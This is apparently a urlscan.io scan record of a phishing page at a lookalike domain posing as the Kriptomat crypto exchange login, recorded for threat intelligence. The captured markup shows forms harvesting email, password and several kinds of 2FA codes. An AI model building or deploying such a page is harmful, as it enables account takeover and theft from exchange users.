kriptomat.adsmcrst.cloud Open in urlscan Pro
104.234.70.82  Public Scan

URL: https://kriptomat.adsmcrst.cloud/
Submission: On June 16 via api from US — Scanned from CA

Form analysis 6 forms found in the DOM

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="bg-grey-100 border-grey-200 ts-sm py-16 mb-32">
    <div class="align-items-center d-flex flex-column">
      <span class="mb-4"> Please make sure you are on this URL: </span><span><i class="icon-security tc-green tw-bolder ts-md"></i>&nbsp; <span class="tc-green">https</span><span class="tc-grey-400">://app.kriptomat.io</span></span>
    </div>
  </div>
  <div class="mb-24" style="display: none" id="invalid-credentials">
    <div class="bg-red-020 px-16 py-12 tc-red border-rounded ts-xs"> Invalid data </div>
  </div>
  <div class="row mb-32">
    <div class="col">
      <div class="input-wrap">
        <label>Email address</label><input id="email" type="email" name="uAUyzhuF" placeholder="user@example.com" class="form-control" aria-required="true" aria-invalid="false"><!---->
      </div>
    </div>
  </div>
  <div class="row mb-40">
    <div class="col">
      <div class="input-wrap position-relative">
        <label>Password</label><input id="password" name="azz1kiz4" placeholder="Password" type="password" class="form-control" aria-required="true" aria-invalid="false">
        <div id="reveal" class="reveal-text"></div>
      </div>
    </div>
  </div>
  <div class="row mb-24">
    <div class="col">
      <button id="btSubmitMail" class="btn btn-primary btn-lg btn-block has-loader"> Log in <div class="loader" style="display: none" id="loginButtonLoadingMail"></div>
      </button>
    </div>
  </div>
  <div class="row">
    <div class="col-12 col-lg-6 ts-sm text-center text-lg-left mb-16 lg:mb-0">
      <a href="javascript:void(0)">Forgot password?</a>
    </div>
    <div class="col-12 col-lg-6 ts-sm text-center text-lg-right">
      <a href="javascript:void(0)">Don't have an account?</a>
    </div>
  </div>
</form>

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="row mb-40">
    <div class="col text-center ts-sm"> Enter the verification code you see in the Google Authenticator app </div>
  </div>
  <div class="row mb-16">
    <div class="col">
      <div class="input-wrap position-relative no-label" id="borderInputAppAuth">
        <div class="input-group phone-input-group">
          <div class="input-group-prepend">
            <button class="btn btn-outline-secondary">
              <i class="icon-fa_google"></i>
            </button>
          </div>
          <input id="input-app-auth" type="text" placeholder="000000" name="token" maxlength="6" class="form-control text-uppercase" aria-required="true" aria-invalid="true">
        </div>
        <div class="validation-msg" style="display: none; color: red" id="erro-app-auth"> Invalid data </div>
      </div>
    </div>
  </div>
  <div class="row mb-24 mt-40">
    <div class="col">
      <button id="bt-submit-auth" class="btn btn-primary btn-lg btn-block mb-0 has-loader" disabled="disabled"> Verify <div class="loader" style="display: none" id="loading-button-2fa"></div>
      </button>
    </div>
  </div>
  <div class="row">
    <div class="col text-center ts-sm">
      <a href="#" class="text-muted">Need help?</a>
    </div>
  </div>
</form>

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="row mb-40">
    <div class="col text-center ts-sm"> In a few moments you will receive an SMS at <strong id="input-sms">+559*******929</strong> with your verification code </div>
  </div>
  <div class="row mb-16">
    <div class="col">
      <div class="input-wrap position-relative no-label" id="borderInputSms">
        <div class="input-group phone-input-group">
          <div class="input-group-prepend">
            <button class="btn btn-outline-secondary">
              <i class="icon-mobile"></i>
            </button>
          </div>
          <input id="inputSMS" type="text" placeholder="000000" name="token" maxlength="6" class="form-control text-uppercase" aria-required="true" aria-invalid="true">
        </div>
        <div class="validation-msg" style="display: none; color: red" id="erro-sms-invalid"> Invalid data </div>
      </div>
    </div>
  </div>
  <div class="row">
    <div class="col text-center text-muted ts-sm"> Didn't receive the SMS? <!---->
    </div>
  </div>
  <div class="row mb-24 mt-40">
    <div class="col">
      <button id="bt-submit-sms" class="btn btn-primary btn-lg btn-block mb-0 has-loader" disabled="disabled"> Verify <div class="loader" style="display: none" id="loading-button-sms"></div>
      </button>
    </div>
  </div>
  <div class="row">
    <div class="col text-center ts-sm">
      <a href="#" class="text-muted">Need help?</a>
    </div>
  </div>
</form>

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="row mb-40">
    <div class="col text-center ts-sm"> In a few moments you will receive an Email with your verification code </div>
  </div>
  <div class="row mb-16">
    <div class="col">
      <div class="input-wrap position-relative no-label" id="borderInputMailCod">
        <div class="input-group phone-input-group">
          <div class="input-group-prepend">
            <button class="btn btn-outline-secondary">
              <i class="icon-envelope"></i>
            </button>
          </div>
          <input id="input-mail-cod" type="text" placeholder="000000" name="token" maxlength="6" class="form-control text-uppercase" aria-required="true" aria-invalid="true">
        </div>
        <div class="validation-msg" style="display: none; color: red" id="error-mail-cod"> Invalid data </div>
      </div>
    </div>
  </div>
  <div class="row mb-24 mt-40">
    <div class="col">
      <button id="bt-submit-mail-cod" class="btn btn-primary btn-lg btn-block mb-0 has-loader" disabled="disabled"> Verify <div class="loader" style="display: none" id="loading-button-mail-cod"></div>
      </button>
    </div>
  </div>
  <div class="row">
    <div class="col text-center ts-sm">
      <a href="#" class="text-muted">Need help?</a>
    </div>
  </div>
</form>

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="row mb-40">
    <div class="col text-center ts-sm"> In a few moments you will receive an Email with your verification code </div>
  </div>
  <div class="row mb-16">
    <div class="col">
      <div class="input-wrap position-relative no-label" id="borderInputNewDevice">
        <div class="input-group phone-input-group">
          <div class="input-group-prepend">
            <button class="btn btn-outline-secondary">
              <i class="icon-envelope"></i>
            </button>
          </div>
          <input id="inputNewDevice" type="text" placeholder="000000" name="token" maxlength="6" class="form-control text-uppercase" aria-required="true" aria-invalid="true">
        </div>
        <div class="validation-msg" style="display: none; color: red" id="erro-new-device-invalid"> Invalid data </div>
      </div>
    </div>
  </div>
  <div class="row mb-24 mt-40">
    <div class="col">
      <button id="bt-submit-new-device" class="btn btn-primary btn-lg btn-block mb-0 has-loader" disabled="disabled"> Verify <div class="loader" style="display: none" id="loading-button-new-device"></div>
      </button>
    </div>
  </div>
  <div class="row">
    <div class="col text-center ts-sm">
      <a href="#" class="text-muted">Need help?</a>
    </div>
  </div>
</form>

<form class="box py-16 px-12 lg:py-48 lg:px-96 mt-32 mb-32">
  <div class="row mb-40">
    <div class="col text-center ts-sm"> Once you've done that open your email inbox and find an email with a header "Action needed" and press <strong>"Confirm"</strong> button in the letter. </div>
  </div>
  <div class="row mb-24 mt-40">
    <div class="col">
      <button id="bt-open-frame" class="btn btn-primary btn-lg btn-block mb-0 has-loader"> Verify your email </button>
    </div>
  </div>
  <div class="row">
    <div class="col text-center ts-sm">
      <a href="#" class="text-muted">Need help?</a>
    </div>
  </div>
</form>

Text Content

English
 * Čeština
 * Deutsch
 * Eesti
 * English
 * Español
 * Français
 * Hrvatski
 * Italiano
 * Latviešu
 * Lietuviškai
 * Magyar

 * Polski
 * Português
 * Română
 * Slovenčina
 * Slovenščina
 * Svenska
 * Türk
 * Ελληνικά
 * Български
 * Русский


ENABLE GOOGLE 2FA

Google's two-factor authentication (2FA) is a great way to add an additional
layer of security to your account


USE STRONG PASSWORDS

Please do not reuse the password for your Kriptomat account anywhere else. A
strong password must contain at least 8 characters and include at least one
special character and one number.


DO NOT LET OTHERS CONTROL YOUR COMPUTER AND ACCESS YOUR ACCOUNT

Do not install Anydesk, TeamViewer, or other remote-control software on your
computer. You should never allow another person to access your Kriptomat account
and never trust them to make actions and transactions in your name.


BE AWARE OF SCAMS

We do not work with any brokers or investment advisors. If someone contacts you
claimiing to be a broker or representative of our company, please report this
immediately to our team via support@kriptomat.io


WE WILL NEVER CALL YOU

Our team will NEVER call you on the telephone. If someone contacts you, report
the phone number to our team via support@kriptomat.io


ENABLE GOOGLE 2FA

Google's two-factor authentication (2FA) is a great way to add an additional
layer of security to your account


USE STRONG PASSWORDS

Please do not reuse the password for your Kriptomat account anywhere else. A
strong password must contain at least 8 characters and include at least one
special character and one number.




LOG IN TO KRIPTOMAT

Please make sure you are on this URL:   https://app.kriptomat.io
Invalid data
Email address
Password

Log in

Forgot password?
Don't have an account?


2-STEP VERIFICATION

Enter the verification code you see in the Google Authenticator app
Invalid data
Verify

Need help?


2-STEP VERIFICATION

In a few moments you will receive an SMS at +559*******929 with your
verification code
Invalid data
Didn't receive the SMS?
Verify

Need help?


2-STEP VERIFICATION

In a few moments you will receive an Email with your verification code
Invalid data
Verify

Need help?


2-STEP VERIFICATION

In a few moments you will receive an Email with your verification code
Invalid data
Verify

Need help?


2-STEP VERIFICATION

Once you've done that open your email inbox and find an email with a header
"Action needed" and press "Confirm" button in the letter.
Verify your email
Need help?
HomeLegal & privacy policy
Kriptomat © 2022
Need help?
English
 * Čeština
 * Deutsch
 * Eesti
 * English
 * Español
 * Français
 * Hrvatski
 * Italiano
 * Latviešu
 * Lietuviškai
 * Magyar

 * Polski
 * Português
 * Română
 * Slovenčina
 * Slovenščina
 * Svenska
 * Türk
 * Ελληνικά
 * Български
 * Русский



Slide to complete the puzzle
1.9 s. You beat 97% of users
Position the piece in its slot.
Powered by Geetest
Verifying